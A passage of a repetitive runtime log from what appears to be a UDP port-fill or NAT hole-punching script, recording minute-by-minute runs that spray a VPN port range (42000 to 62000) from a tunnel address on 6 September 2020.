to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:17:05 -Starting port fill at 2020-09-06 07:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:18:07 -Starting port fill at 2020-09-06 07:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:19:04 -Starting port fill at 2020-09-06 07:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:20:05 -Starting port fill at 2020-09-06 07:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:21:04 -Starting port fill at 2020-09-06 07:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 07:22:06 -Starting port fill at 2020-09-06 07:23:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:23:05 -Starting port fill at 2020-09-06 07:24:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 07:24:06 -Starting port fill at 2020-09-06 07:25:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:25:05 -Starting port fill at 2020-09-06 07:26:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:26:04 -Starting port fill at 2020-09-06 07:27:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:27:04 -Starting port fill at 2020-09-06 07:28:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:28:04 -Starting port fill at 2020-09-06 07:29:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:29:04 -Starting port fill at 2020-09-06 07:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:30:05 -Starting port fill at 2020-09-06 07:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 07:31:07 -Starting port fill at 2020-09-06 07:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:32:05 -Starting port fill at 2020-09-06 07:33:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:33:05 -Starting port fill at 2020-09-06 07:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 07:34:07 -Starting port fill at 2020-09-06 07:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 07:35:07 -Starting port fill at 2020-09-06 07:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 07:36:07 -Starting port fill at 2020-09-06 07:37:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:37:06 -Starting port fill at 2020-09-06 07:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 07:38:06 -Starting port fill at 2020-09-06 07:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:39:04 -Starting port fill at 2020-09-06 07:40:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:40:04 -Starting port fill at 2020-09-06 07:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:41:04 -Starting port fill at 2020-09-06 07:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:42:04 -Starting port fill at 2020-09-06 07:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:43:04 -Starting port fill at 2020-09-06 07:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 